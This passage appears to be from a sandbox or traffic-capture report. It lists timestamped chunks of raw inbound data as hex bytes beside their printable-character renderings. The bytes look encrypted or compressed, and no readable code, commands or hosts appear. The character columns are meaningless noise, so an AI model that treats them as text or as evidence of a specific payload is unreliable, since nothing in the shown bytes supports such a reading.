                                                                                                        2022-09-29 12:45:35 UTC3679INData Raw: 55 c4 fd 7b b5 4f b0 eb 70 10 08 e8 ec 44 23 47 40 1c 3d 1f f2 48 fe c4 56 52 02 bd 41 57 a1 b0 df 1f 47 de 3e 6e b7 7d ec 83 b4 c8 d1 47 b3 57 af 83 2e a7 f7 d8 64 4e 94 07 fe 55 6b 52 4b 87 95 6e bc 5e 66 9a ca c6 f9 25 71 c3 50 7e ff 19 4a 44 a6 b3 89 0a 90 8d e6 1a 05 cc c8 7b 51 77 6d 92 c2 10 8c 5b fb 11 f2 54 f0 d1 5a 53 27 a9 5a 19 54 12 9e cb 7c a3 be 1f db 0d c8 01 0b 07 38 44 eb 43 73 b8 c5 47 ac de fa bc 6e 63 8e 50 1b 57 c1 7d 02 47 84 88 c2 7b c3 72 2a cd 6e 0a 18 c3 95 8f fe 0b 85 0d dd 12 81 e9 2c 02 e1 32 43 9e 83 5d 28 20 e9 b6 cd 0d 33 72 9d c3 42 a1 22 14 8e 01 ba e0 15 33 b6 42 3d 46 5a 6c ce 19 4e 0d 03 9a 89 41 5f 64 c4 f5 36 7d 19 7f a2 f1 18 8e 94 43 70 0c 08 1a 49 f1 7f 7d cb 8c ba b2 79 19 56 9f d8 b6 7c c2 9e 00 08 55 e7 b7 45
                                                                                                        Data Ascii: U{OpD#G@=HVRAWG>n}GW.dNUkRKn^f%qP~JD{Qwm[TZS'ZT|8DCsGncPW}G{r*n,2C]( 3rB"3B=FZlNA_d6}CpI}yV|UE
                                                                                                        2022-09-29 12:45:35 UTC3689INData Raw: 9d 47 4a 0c ae 39 ac 7e b8 37 a6 56 9e 2f 64 6e 5f 7d 9e 0e 08 4f ed 3c 2f e1 6a ee e1 2e c6 02 c9 dc 26 cf 82 b2 ff 88 06 54 83 12 33 de 26 d0 3d df 8a 14 36 ad f8 56 03 de 1c ad fe 0f 2b f4 5d 5e de db 80 85 da 90 a4 96 84 01 0d 40 38 9a e6 82 4d a6 a8 fd ea a4 b2 84 91 59 25 e8 ac 05 46 f7 87 91 1c 79 13 4a 17 d5 7d 28 75 bf c9 3c 42 a1 82 8a 34 74 27 0b f4 20 50 df 35 27 d9 8e a9 b4 31 13 a5 8e 17 27 df 73 50 e3 5d d6 4f 8e d4 ea b7 66 44 69 a3 c4 27 9a 83 15 18 5a 9a 2e f4 3d 05 d8 e7 f5 d3 e6 39 a7 02 62 df 29 9f ee cc b4 cf d2 62 fb ec 4a 30 05 74 de 52 4b ff 31 5b 21 10 fe 3b fd 1d 3d 72 48 2b de 37 79 03 a4 38 96 bc 35 d4 8e 73 9c b6 84 5a 4b 55 e6 da 73 63 44 fd b6 99 54 3b 09 f3 a2 2b da 79 86 60 82 c8 47 9f ee 51 75 0f 06 aa e9 ad f2 6f 17 43
                                                                                                        Data Ascii: GJ9~7V/dn_}O</j.&T3&=6V+]^@8MY%FyJ}(u<B4t' P5'1'sP]OfDi'Z.=9b)bJ0tRK1[!;=rH+7y85sZKUscDT;+y`GQuoC
                                                                                                        2022-09-29 12:45:35 UTC3705INData Raw: 1c d7 97 74 57 b2 21 70 79 fd c2 b1 13 d2 fc 79 f1 51 46 c4 91 1f d0 6d 10 56 a9 06 5c 93 da 8e 48 12 96 5c cf e3 49 df 40 a8 14 0e ba 0a 63 36 30 56 95 89 b4 b0 b9 f6 ae f4 1c de 6f d6 1b c6 4b 47 4d 85 bd 01 38 c1 1a 5f 1a 2f 7d 2f 5c 3e 14 95 6d 69 4d ac ff 8b e4 52 ca db cf 4c 07 84 8e b8 fb ec 7b bd eb f2 c7 31 b9 e0 9d 72 ca be 36 d6 b2 e3 69 bd 3c d3 d8 f8 8c 37 ee 06 5f b8 43 6f a6 c4 c5 4a ec 67 3f 17 28 af 9f 25 df 19 3f 72 06 4a fc d7 2d e6 94 db bd cd 17 5a e5 11 a2 40 e5 19 e9 75 2d 29 f4 5e 4c 76 ef 5b c4 0f b1 76 35 7a 84 a8 98 99 29 d6 5b df 48 f1 ae 35 63 7f 7d 72 43 80 7e 9f 12 c1 cc e5 7a d7 74 d1 f7 95 42 6b b4 05 c4 ed 6a 43 7f da 88 56 52 20 7e 4c a6 18 a0 dc b0 95 de 81 6c 8d 93 f1 ec 9e 2c f7 12 bb ea d4 a6 e3 b3 3b 64 4d a5 7c 3a
                                                                                                        Data Ascii: tW!pyyQFmV\H\I@c60VoKGM8_/}/\>miMRL{1r6i<7_CoJg?(%?rJ-Z@u-)^Lv[v5z)[H5c}rC~ztBkjCVR ~Ll,;dM|:
                                                                                                        2022-09-29 12:45:35 UTC3721INData Raw: f7 83 31 4c 2f b0 7b 94 d9 20 39 86 a4 a0 cf 77 fa a1 62 4e 02 ed 4d 64 c8 0f 0e eb a2 c4 89 a2 fd 77 e7 f6 f4 fe fa 7d b1 26 71 36 a3 43 af e9 08 9a 9d 86 45 7c 10 74 bd 91 e4 ba c8 1e d9 18 10 ce ca c7 e5 cd d0 55 0b 30 c9 62 32 d0 39 a3 81 88 4a 14 c1 6f 33 39 d8 82 b1 f9 ad 8b 91 a1 b7 c4 fc 1b e2 2f 5c ac 64 dd 9e 58 0f 88 47 0b 09 bc 69 1c 5b 29 f4 e4 86 ab f1 8e 8c 3f 87 fc 25 00 04 02 2b 56 07 1a 97 07 80 e7 10 7f f3 35 ca e9 6c a0 a3 12 ca 37 57 95 c9 90 69 ca 95 38 b6 8f 3c 44 15 2f ae 8e 3b 5f e8 72 46 86 75 06 ef 8a a8 88 5b dc 7b f6 08 af 15 48 bd 2b fc ed 07 81 4f 34 96 11 eb 60 e3 b7 93 64 4e 36 55 5b 81 aa bb 36 11 af 68 ec 46 3f 53 5a 5f 98 ea f4 3c fd fe 71 99 bd 8f 3c 0e aa 8a a8 2a 64 19 8d 4f 0a bf 4f f5 af 4f 91 fc 2f 17 c0 f3 87 3b
                                                                                                        Data Ascii: 1L/{ 9wbNMdw}&q6CE|tU0b29Jo39/\dXGi[)?%+V5l7Wi8<D/;_rFu[{H+O4`dN6U[6hF?SZ_<q<*dOOO/;
                                                                                                        2022-09-29 12:45:35 UTC3737INData Raw: 1f e7 3a 3d 4f 47 79 91 a1 70 e1 7e 8b e5 b2 a4 2f 30 12 93 9d dc 91 07 32 d0 e4 a9 24 d9 a4 e3 f6 31 38 f0 8d 4a ec f5 5b 35 0c a1 52 bd 6d 08 9e 18 00 83 a1 fc fc d3 e1 5b e1 20 d0 b6 88 b1 c3 c6 2d 72 5f 31 04 3c f1 e2 49 b6 dc 89 c5 cc a7 fa 21 3d b9 77 e0 f9 3c ed 79 ab 73 72 cf c4 9e 77 fc 66 a7 94 42 94 9e 80 8a 57 f8 86 96 b2 c9 4f 62 f9 ba b5 94 23 1d 59 12 df 11 24 45 c5 dd fc f8 12 61 cd 57 b1 80 ab 2a 00 b3 19 e2 c2 ea 00 54 f1 ce c0 e5 42 27 ee 49 4e 2b 38 87 59 e5 e8 60 fe 63 4e eb 57 11 e5 b4 d6 e7 25 6e b9 e6 f0 f2 00 ad b5 c3 85 74 c5 05 db 21 64 9d 9c 5e af 0c 2c ff 75 fb bd e1 0a 88 9c 3b 73 e2 34 48 28 98 dc 5f b6 88 79 c3 3f 5c 6c 93 61 aa 2c 52 5e 7f 65 3e bf a2 1a 87 ae fb 42 bc f3 ae cd 80 3e a5 9a fd 38 a1 8f a5 5c f5 27 a1 c0 4a
                                                                                                        Data Ascii: :=OGyp~/02$18J[5Rm[ -r_1<I!=w<ysrwfBWOb#Y$EaW*TB'IN+8Y`cNW%nt!d^,u;s4H(_y?\la,R^e>B>8\'J
                                                                                                        2022-09-29 12:45:35 UTC3753INData Raw: 76 ac 5c f3 6e d8 9f b9 5c 7f f0 36 cb da 1a 46 37 1c 6f 0c 6f 56 0f 96 70 f3 a1 8d 63 5e 1f 59 57 ae 40 d7 99 ad b6 f7 f1 87 a4 92 b3 11 da cb f4 c2 43 fa d8 f9 bf 63 23 1c 90 97 0e f9 0e 66 ba 1c c3 98 48 e1 80 85 84 31 23 00 20 e0 72 72 c6 41 d9 d1 3c 7c 2a 87 80 4e 41 3c 14 a2 bf db 2c 32 82 16 69 6e 36 db a9 03 22 3e a2 2c cf 3e 7a e1 64 f6 94 ba 0b ac 95 fb 19 d9 0e 22 d5 42 19 80 a2 5c 18 c5 62 bf df ef 4c 75 ae a8 41 96 51 ec f2 f7 49 4f d3 15 42 f5 da 96 f6 fd 4e c0 ee b7 1b c9 5c a4 ef f6 b5 05 64 84 92 7a e1 34 2b 58 4e 1f 13 eb 64 01 f1 d8 87 d0 69 d8 e1 f6 f2 57 ed f7 60 ef 2e e8 02 a8 f9 88 cf ad b3 eb 07 61 7c 59 cf e5 c0 4d 87 72 ea 63 54 ec c9 0c 0f a9 07 6b 69 0b 24 46 9d 21 a6 ee 1a 60 38 98 59 6d 81 31 d4 78 5a 8c 83 38 48 e0 70 a6 a3
                                                                                                        Data Ascii: v\n\6F7ooVpc^YW@Cc#fH1# rrA<|*NA<,2in6">,>zd"B\bLuAQIOBN\dz4+XNdiW`.a|YMrcTki$F!`8Ym1xZ8Hp
                                                                                                        2022-09-29 12:45:35 UTC3769INData Raw: c7 44 b8 db 24 07 28 23 aa 14 81 35 34 69 cb 45 9d 44 ce 8c f5 58 0d ef aa b6 56 b0 54 09 54 75 69 d0 0a ea e0 ae 31 0b 9a a3 6b 15 10 4c f5 f7 3e 5d a1 89 a7 b3 c9 13 aa a9 d0 f1 49 da 66 59 3c cd 0e 44 63 f7 f2 f4 75 e7 a8 0d 4c 37 ef 87 08 df f9 b5 07 30 d6 68 62 b8 1f 4b 0b ae c2 2d e9 bf 32 41 58 38 9b 2c 29 8c 4f 2c 6c bd 86 db be f3 21 19 34 2c e2 d6 22 77 38 7a 46 02 67 31 82 b2 30 03 53 59 16 13 d7 8b 15 08 3f cb 3d fb c9 47 85 4f f0 2c c3 02 62 45 cc ca 86 3f 1d 46 14 ae 27 5f 87 a9 2e 1b ae 2b 6c 65 03 b0 bd d8 59 7b 37 d7 99 e3 3a 52 3c 07 5e b7 5a b2 ff ac bc 92 16 0e b3 5a a5 d8 dc f0 ef eb 6d 3d 60 0b 9a c7 68 05 38 25 85 a5 78 2a 9c 02 b2 86 4c 46 6e 3d 5d 69 ea bb 9f 3f fa 31 ce f2 4a d6 5e 7e 26 1d 9f 8c a8 ed 4a 1d 30 19 01 12 bc bd 84
                                                                                                        Data Ascii: D$(#54iEDXVTTui1kL>]IfY<DcuL70hbK-2AX8,)O,l!4,"w8zFg10SY?=GO,bE?F'_.+leY{7:R<^ZZm=`h8%x*LFn=]i?1J^~&J0
                                                                                                        2022-09-29 12:45:35 UTC3785INData Raw: bb 3c 0d b0 6e e9 3a a4 02 54 02 42 23 90 94 55 40 3b 52 24 94 8e e9 10 b0 38 b9 22 19 5e 87 48 d8 06 69 ac 59 2f 0a 7c c4 0b d7 70 9a d6 f2 6a a1 de d6 c1 17 f0 72 38 a4 b3 35 7f d1 24 e0 0b 4f 1e 57 51 e2 f9 5e 85 bb 23 ed 0a 95 20 e4 7c 88 c7 d0 d6 23 b5 42 96 c7 e5 ef dd e7 cf 85 03 47 5d 2d 2c f1 c7 14 e7 fd 81 32 e2 e6 e0 e8 0a 8c de 5c 5c 8e d5 38 7c c5 c9 2a ae c1 46 e2 ff 01 b8 bf d7 9b 88 2e 18 2b da c7 83 0c f9 04 8d c8 6e 96 83 47 bd d7 87 8e 16 7f 13 19 ce 1f 02 0d 26 b8 4f 21 f1 b7 55 4a 22 be df c2 3e 08 64 0e ab 9a 44 f5 20 b9 b8 5c 18 b7 5c 80 11 46 79 6b 97 7f f0 4f 9f db bc a7 f3 6d 2c 71 97 61 d1 a8 77 08 c1 d2 5f 4a 1f fc 4e 6f 2b a4 39 b3 f2 84 27 1d 20 de 31 ae d6 52 cb 96 38 69 bb 1f f9 ee f4 f5 e2 e3 79 fc 74 be fc 3c 30 fe 14 06
                                                                                                        Data Ascii: <n:TB#U@;R$8"^HiY/|pjr85$OWQ^# |#BG]-,2\\8|*F.+nG&O!UJ">dD \\FykOm,qaw_JNo+9' 1R8iyt<0
                                                                                                        2022-09-29 12:45:35 UTC3801INData Raw: f4 c4 97 8c ab 0c 02 e7 ef 50 bd 97 ad 04 00 d2 9d b3 b9 c2 bc 38 36 15 7f f1 ba b3 a0 f0 79 15 8b 1a 59 06 eb 3d f5 7c ef 84 26 e7 85 35 a5 4b d5 32 81 45 7d 1d db d2 28 1d a8 45 c5 2d 1d f5 60 cc aa dc 58 8a 71 68 f9 e8 3b 10 fe ce 12 9f 44 2f fe ad 2f cd 88 e8 ee c0 51 b3 b0 54 b4 55 7d e5 f4 26 27 c4 da 61 da 39 26 16 30 80 28 2f 7d af e1 6f 38 08 35 04 58 6d 26 a1 dc c0 c0 4b a6 6e 1d 61 26 19 b5 26 fe bd 8a a6 ae 70 4c a8 4d 96 87 a5 7b e7 3c 25 ad 23 cc d2 93 b4 07 c5 6f 4f 98 f6 22 db 90 82 e6 9a 14 c0 f5 fa 6b 9c 91 04 df 05 90 41 15 5f e2 87 49 5f 0e e4 e5 9c 91 e4 aa b6 c9 27 28 cf 78 5b b4 ec 78 0b 30 e1 8b 54 c4 ca a4 74 77 c6 24 47 fe 17 d4 33 08 be dc 59 03 cf d0 ba 08 37 a9 8c 56 7b 6e 05 08 ed e1 23 64 6b 64 9f d8 2f 05 9d f3 97 71 7e 10
                                                                                                        Data Ascii: P86yY=|&5K2E}(E-`Xqh;D//QTU}&'a9&0(/}o85Xm&Kna&&pLM{<%#oO"kA_I_'(x[x0Ttw$G3Y7V{n#dkd/q~
                                                                                                        2022-09-29 12:45:35 UTC3817INData Raw: ff 6e 9b e6 89 01 ac 33 42 41 93 cc 7c 77 e6 d7 8e 30 ad 3b 7b be ef 93 4c 5b 50 02 bf e8 e0 a6 48 b7 b9 a5 f7 3b 5b 02 8c de 48 9d 38 bc 21 d0 27 50 ee 92 3c b7 03 28 0f c1 01 73 07 88 59 9b 0a 7d 41 2d bd 8d 22 2a 64 e4 c7 9a 84 a9 f6 0f 68 5a ed 27 7e ec 6d b5 1d 41 36 37 8f 28 c6 a9 4d 43 10 ee f8 33 96 b7 48 cf 92 33 9b 81 ce d6 16 d7 52 b8 89 d4 e2 2f 2e 65 23 b9 a8 db 0b 3f 40 b0 c9 e9 b7 14 a7 77 23 27 4b 4b 33 7d fa 00 43 5b 2c 47 89 31 12 6c 46 33 99 e0 3f 8d 63 ac 0a 53 2b 70 98 57 92 a8 16 bd 02 a7 2a ce 41 a4 ee 60 03 2e 2a 85 6a 6b 2f 79 57 57 81 a3 58 12 85 cd 90 e2 13 3e 58 ef dd 52 9b 78 7a b5 d8 bc 01 39 cc 78 02 91 23 6a 52 da 02 20 9a 46 25 5b 43 d9 2f dd ac 43 8b 5e 4f ef 60 3c ba 80 a6 17 1f c8 5c 81 9c 3f c5 20 65 d8 26 4d a2 c6 2e
                                                                                                        Data Ascii: n3BA|w0;{L[PH;[H8!'P<(sY}A-"*dhZ'~mA67(MC3H3R/.e#?@w#'KK3}C[,G1lF3?cS+pW*A`.*jk/yWWX>XRxz9x#jR F%[C/C^O`<\? e&M.
                                                                                                        2022-09-29 12:45:35 UTC3833INData Raw: 82 9e 8b cb a8 61 13 ce 71 e3 0b c7 1d d5 29 9f 3c 60 09 1c e7 ea 94 7e 33 10 df b3 2c a7 aa 8e bd 74 28 72 8c 62 cb 06 ca 47 f5 19 8e c2 a7 71 83 3b c5 26 3b 14 84 10 f0 b7 52 d6 78 3b 41 4f 88 ed 18 c6 de a8 0a 83 54 28 1d 00 20 8a 0a e8 ca b9 95 07 f0 d2 82 b0 89 85 93 f8 fd 44 9c 22 c8 19 e5 f7 f1 94 03 1f 91 3d 46 6a c8 73 70 9b ac b3 d2 78 de 7d bb 9e 3a 01 c4 5a 96 e1 a8 e9 53 ea 15 35 f4 e4 75 d7 4a 82 a8 94 4a cd 3d eb 69 9d 30 4f 07 1f b0 81 79 92 1e c9 72 10 60 41 d8 ee 5d 95 d8 85 5f 0f 35 60 5e c8 6c 95 85 e8 1b fc 0d b4 78 1a 84 29 4a 9b 85 5f a8 6d 87 5a 4d d2 01 5f 53 47 01 89 0b 59 e2 b4 66 83 63 0e c3 fc 7f 1e ff a3 a1 a6 13 b5 49 88 72 b6 2b 03 69 18 56 53 b8 ea 86 5c 98 f8 1f 64 87 d3 5e 10 d3 61 98 71 71 2d a5 95 50 0e ee 84 55 c5 17
                                                                                                        Data Ascii: aq)<`~3,t(rbGq;&;Rx;AOT( D"=Fjspx}:ZS5uJJ=i0Oyr`A]_5`^lx)J_mZM_SGYfcIr+iVS\d^aqq-PU
                                                                                                        2022-09-29 12:45:35 UTC3849INData Raw: f2 a8 02 c0 54 c8 fc c8 70 0f 4f a4 f3 74 53 06 1b 10 e7 28 d5 08 17 2b b8 9a 6b d6 c9 61 89 49 6e 0b 29 c1 c2 c8 20 54 3f 6b 8f 64 c1 eb 28 b4 f8 96 ac ab 0d 05 95 89 40 ae 2e 11 9c d1 ab 4a c7 33 d2 c9 cd fd 1e fc 60 a0 10 a9 54 86 7c 35 d4 1f b3 35 f1 4d f0 79 98 fd 79 97 0d ed 6f 52 93 5e dc 50 22 1e 55 5d 0e 10 c6 a2 a3 4b 71 a0 a8 ee 1f b7 f9 37 9c 8a d1 94 ee 23 0a 3e 30 b1 d2 31 a7 fc f2 45 ba 7c 7c ab cd f8 13 b4 bb 32 cf 78 c3 60 d6 e9 ec 5b a7 01 03 dd 12 27 b4 5b 01 f9 59 76 60 c2 55 a8 79 8f e8 5f d6 12 f7 dc da 8d 4e 2c 7c b4 2c 78 62 1d 41 8a e3 89 24 4d c3 85 3c 4a 2f 53 39 0a 5d 5a b7 d4 2d 4a ef 4e 86 46 33 44 8e 37 cc 44 de db e5 d6 0a 98 5e 7c 90 71 48 35 5e 3f 30 65 d2 b7 a9 fb c3 34 63 d6 31 45 39 25 ff 35 84 ce 8f 3a 97 da c8 7b c2
                                                                                                        Data Ascii: TpOtS(+kaIn) T?kd(@.J3`T|55MyyoR^P"U]Kq7#>01E||2x`['[Yv`Uy_N,|,xbA$M<J/S9]Z-JNF3D7D^|qH5^?0e4c1E9%5:{
                                                                                                        2022-09-29 12:45:35 UTC3865INData Raw: 8f ae 0b 42 82 60 29 5c da 6d c4 ec 3e 8e d7 4e d9 f2 9f a9 3b 1d 34 25 06 b8 c4 53 06 e5 36 19 a2 50 3f 8c c5 4f f6 1a 8d 7a cc 0d 0f b6 14 ea a7 d5 d8 4e ba 4f 21 93 67 53 e0 80 23 f0 2f b6 80 36 92 7b 31 35 ba e2 96 72 fd 9b dc 51 b8 11 9c 6c 91 4a ef ee 56 ed ad da 4a 3d 17 ab 16 36 6f 73 54 a1 83 58 e8 7d 25 a5 92 b9 16 f8 40 bb 16 8b e0 45 72 9a ff 14 b6 3c 0b b1 af e8 50 dc df 57 af 58 19 36 bb 1f d4 2c 4a 27 3c f4 0e 1a d6 ac af 57 b7 4c 95 ef 03 7e 47 96 ca 66 b4 67 f7 45 2d bd 23 22 2c 00 43 1d b3 cc 13 41 3b cc 29 29 90 36 ee 7d ef 99 cb 7a a0 1e 70 e1 e7 c0 f3 e8 d8 ef a8 87 7a 4d d1 37 42 06 f0 65 ec f7 26 cc 28 27 96 7c b4 1a 6b a7 8d 74 ce 5f e3 94 45 5c 43 30 e1 83 74 cd d2 e2 7d 64 56 3d db fd e8 d8 4e 32 43 2e 06 92 11 ed 2b f9 2a 6a e6
                                                                                                        Data Ascii: B`)\m>N;4%S6P?OzNO!gS#/6{15rQlJVJ=6osTX}%@Er<PWX6,J'<WL~GfgE-#",CA;))6}zpzM7Be&('|kt_E\C0t}dV=N2C.+*j
                                                                                                        2022-09-29 12:45:35 UTC3881INData Raw: a8 94 a1 5e 61 ca 64 bc 84 22 23 10 16 73 c5 e2 ca f4 5c da 53 0e 0c 31 db 23 f9 3f e8 e7 fc 78 7e e6 db e4 4b ba 24 22 51 c0 9c d2 cb ac 2a 45 12 8b f6 80 70 1e 0b 02 7c 25 a5 49 4b c7 8e 07 9d ed 04 07 90 0c b1 de 8a 71 5e e8 c8 82 0c 94 d6 7d 4c 67 0f 9d 82 e1 b4 f7 21 d0 4a 64 05 ef 69 28 d5 df c0 2c d4 58 a7 2b fc c7 e5 8f 42 34 1d 4a b5 1c 79 28 7f 4a c7 53 5f e8 53 ca 9d 45 e7 ce 70 09 20 50 dd 72 8a aa cf ee b3 5c 9d e3 02 80 3f 3a 06 36 43 42 22 d1 4e dd c6 21 ff cb fa 42 03 76 be 9c 88 b1 81 a6 65 91 1a 19 25 2b 96 90 f2 af 78 40 01 36 ca 53 c0 74 fd 58 55 0e 82 fd 80 e1 d6 6d 37 12 a4 b8 c7 85 92 84 2f e4 cc 6e 90 e4 25 48 de 07 94 9e 6b d1 ad b0 83 d7 00 29 7f 46 63 6d b6 6f 6d dd 13 0f 14 f9 d8 9f 5a e6 e6 9c 46 17 39 48 a0 b9 27 04 4a 1c ce
                                                                                                        Data Ascii: ^ad"#s\S1#?x~K$"Q*Ep|%IKq^}Lg!Jdi(,X+B4Jy(JS_SEp Pr\?:6CB"N!Bve%+x@6StXUm7/n%Hk)FcmomZF9H'J
                                                                                                        2022-09-29 12:45:35 UTC3897INData Raw: d3 c3 9c b0 54 fd dc 1b cd b3 72 1d 5d 67 cb 9f 07 dd 27 b3 2a 15 d1 7d 6d ab 3d cf 91 d4 de 44 79 95 83 73 b6 12 97 ce 48 78 5c 28 d3 52 d4 2a 62 cd 19 db 63 67 1b 0d 4f 02 09 47 c4 8d 2b 74 36 bd 13 c6 f5 d8 18 9f 2d 58 9b 8d 12 97 96 af 7b e2 db 95 bf 10 36 c2 20 04 8e 42 85 71 0d f9 a0 8b 5b 07 c9 4c 6d 25 02 5e c6 df b4 73 87 48 a0 4e 52 28 b8 a1 6f af ba 68 2e 95 2f 15 43 61 0b be 3c 24 57 25 22 e3 68 cc 04 26 c6 e9 12 6f 5b 21 3c 46 12 60 ae 16 80 10 a6 48 b8 0b 6d b1 50 3e 74 30 cd a2 52 15 8f 1e b7 aa ed 86 75 66 c9 c0 9d d2 a1 6f 16 d3 f5 a9 3d aa 04 72 d8 8e 54 47 c0 ae 03 c1 40 c4 94 4d 97 3a 63 bd 73 45 58 de 58 e9 0c 88 2a c1 f7 f6 ce 1b 24 7e a6 63 2a 93 1b 12 f6 f1 b5 07 6b 31 0d 6c 36 cc f8 dc 2a a9 bb 14 01 5a bb 66 15 ce ed dc 90 48 f9
                                                                                                        Data Ascii: Tr]g'*}m=DysHx\(R*bcgOG+t6-X{6 Bq[Lm%^sHNR(oh./Ca<$W%"h&o[!<F`HmP>t0Rufo=rTG@M:csEXX*$~c*k1l6*ZfH
                                                                                                        2022-09-29 12:45:35 UTC3913INData Raw: 86 94 08 3a 0b ac e6 07 ef b9 d1 dd f3 bc 0a d2 3d 04 5e c0 c3 1e 93 a5 42 b6 2d 8c cf 1a ba 6f ad aa 0c 55 1e 9c 9a fd 25 4b aa eb 5e ec 76 75 3b e0 0d 25 51 52 c7 88 c5 d0 c3 70 e9 8f 2c 16 0f 51 bd 7e 48 65 51 f4 71 54 36 c3 1d a1 10 4e 5a 10 0f 04 ae fb fd 44 ed 5c a9 00 f0 7f bb a2 76 b2 0a 93 9c 03 67 59 f8 67 58 46 af be b0 b8 d6 95 77 f8 76 cb 0b e9 9f 1a 62 67 13 fe 5b 19 46 56 98 41 73 4b a8 5e 76 91 7e dc 17 1f 57 c4 35 1e 5b d4 2b dd 9d ef 65 95 a6 e0 49 d2 e4 e3 dc a4 d4 df 06 d8 2f dd 54 cf 66 b9 c4 c6 9a df 4a c5 6b 20 4b 36 9a 65 21 0d 03 de 63 34 4b c6 75 e3 9b 3f e5 3a 93 45 d0 0a 8e 8b 60 e8 14 7c 44 9d 9c a6 b9 c3 83 ad fa eb b5 2e f4 21 ee 9d 69 c0 e8 dc c6 fa 1d 1b 82 cd 0d 35 57 be cd e1 76 fe 98 ea 8e 7d be 74 23 70 4f 70 8b d7 54
                                                                                                        Data Ascii: :=^B-oU%K^vu;%QRp,Q~HeQqT6NZD\vgYgXFwvbg[FVAsK^v~W5[+eI/TfJk K6e!c4Ku?:E`|D.!i5Wv}t#pOpT
                                                                                                        2022-09-29 12:45:35 UTC3929INData Raw: 46 cc 14 a8 15 51 98 f2 42 16 92 21 38 7b 8b a4 4f 20 5d ac 27 f7 81 c7 f9 77 ff 14 cd 86 ab 4c 26 53 25 4c 8b 59 4e 96 50 3e 87 3b 0a 94 62 83 ae 87 c1 f6 17 f2 7e 6a 7a eb 09 a2 fa 0c c4 32 a7 63 e4 ea 82 a7 e1 36 41 33 18 e8 a0 52 11 75 89 3d e4 31 c4 e9 78 b4 02 43 b3 a8 bc b8 2d 4f dc 1f 8d 45 0c 24 5c 9b 4d 9b 0e 5b c5 b0 40 30 46 61 ca 1e b1 0d 65 1b b6 03 05 7c 74 4a 39 bf 40 ae f8 f9 09 15 9e 00 b1 59 be ba 5f 3d c8 67 73 55 75 50 98 e4 67 4c e7 41 0c 4d 0a 02 9e aa ae 3b b1 9d bf 13 ad 7e 82 92 87 36 01 af f2 1c dc e8 cd 73 f9 69 61 6a 89 55 aa df 8f 5b 3b cc d9 2d 7b a7 21 bf 18 4d 6f 5f a9 62 13 33 2b 1f d4 a4 c8 09 84 1a e0 c0 75 5e 1f 05 9f 0c 37 4f 83 30 57 d4 5e cf af 8b 57 38 2f 2a e3 30 18 d1 01 28 27 e2 9b e8 1b e1 89 de d6 9e 75 07 3b
                                                                                                        Data Ascii: FQB!8{O ]'wL&S%LYNP>;b~jz2c6A3Ru=1xC-OE$\M[@0Fae|tJ9@Y_=gsUuPgLAM;~6siajU[;-{!Mo_b3+u^7O0W^W8/*0('u;
                                                                                                        2022-09-29 12:45:35 UTC3945INData Raw: a1 43 0a 2c f9 4d 53 60 3e fc 46 a1 bd 05 36 d9 bf a0 67 f9 19 bb ca 5a 18 6e 40 76 34 8f fb 82 8b ba 7c d8 c0 8c 5b 75 34 bc e3 99 f5 7e ed 8e f4 49 83 a5 cd 20 6e 8d 63 92 9e 39 5c 0d 90 aa a8 16 b8 64 5d 9b 94 a6 6c c8 75 62 39 41 13 a9 79 62 25 40 c1 33 ad 71 bd 76 2d 24 c1 08 41 53 e2 15 ef a2 79 bf e5 b4 90 b0 42 fd 03 b3 4d 73 53 36 ac d5 34 9c 08 de 4c 9c b1 ac 2a 01 1a bc 7d 2f 6f d0 4a 39 6a 54 5f 27 b8 bf a5 dd 29 15 4c 09 5a 97 f6 d5 c7 04 ec a7 c9 f8 56 da ce cf 6b a4 b2 02 d0 94 08 f9 02 56 f1 78 4f 5e 5a 51 8b 79 71 34 d5 76 a1 52 69 61 59 c8 93 53 fb b7 09 9f 09 cc 00 9c e6 fb 8a 02 7d 98 9e 23 1d 49 96 ac af 2f 71 cd c4 8b a1 66 89 8b 46 57 3e 16 9d 8f bb 00 be e0 d4 a3 bf 10 09 c0 8e 51 be da 87 a7 fc 13 a2 b6 71 3c 08 4e 45 aa 86 37 db
                                                                                                        Data Ascii: C,MS`>F6gZn@v4|[u4~I nc9\d]lub9Ayb%@3qv-$ASyBMsS64L*}/oJ9jT_')LZVkVxO^ZQyq4vRiaYS}#I/qfFW>Qq<NE7
                                                                                                        2022-09-29 12:45:35 UTC3961INData Raw: 97 44 d1 de ea 9f e4 82 24 1d 3c 43 f5 c1 1f 0a 1f 1d 05 8e 33 77 34 dd bb 00 f8 64 45 9a 96 00 8c 24 5f 30 3c 87 99 82 57 56 98 49 e6 33 21 e6 a2 86 5e 4f 61 ad 71 6b 2a 06 20 6c fd be 6a 5b 6c f3 84 5c 3e 74 94 71 00 e0 55 92 7e de 45 37 a2 01 bc 04 af 9f 66 97 cb 50 5d 95 cb cb ce e0 9d 39 96 8f ed 02 4f cc eb 59 61 4f 88 fa 7f 82 f1 0e a3 b0 a3 d3 da fd 1c aa b6 ba 1f 9a 18 8c f4 67 00 af e2 49 57 0e 70 1a d0 a0 c3 72 f5 a4 e9 61 53 5d ec 74 fe 84 40 f2 27 4e cd b6 88 60 a2 ba 0e a1 65 ca c3 29 a8 b4 90 2c e8 45 f9 ac e9 6f b9 09 4a bb 14 72 3c e7 07 58 2a 1e 86 cb 6c 83 36 0e a9 5c 14 a7 4a 2f 90 2c 97 e4 55 cc 57 d8 1f 8e 00 c6 13 29 d7 1e 42 b8 d9 61 d9 3b 65 46 ad 00 23 dc 2f ed 17 8f 84 11 17 51 49 93 a5 43 48 23 1b 34 24 68 3d 66 02 8e 38 fb 99
                                                                                                        Data Ascii: D$<C3w4dE$_0<WVI3!^Oaqk* lj[l\>tqU~E7fP]9OYaOgIWpraS]t@'N`e),EoJr<X*l6\J/,UW)Ba;eF#/QICH#4$h=f8
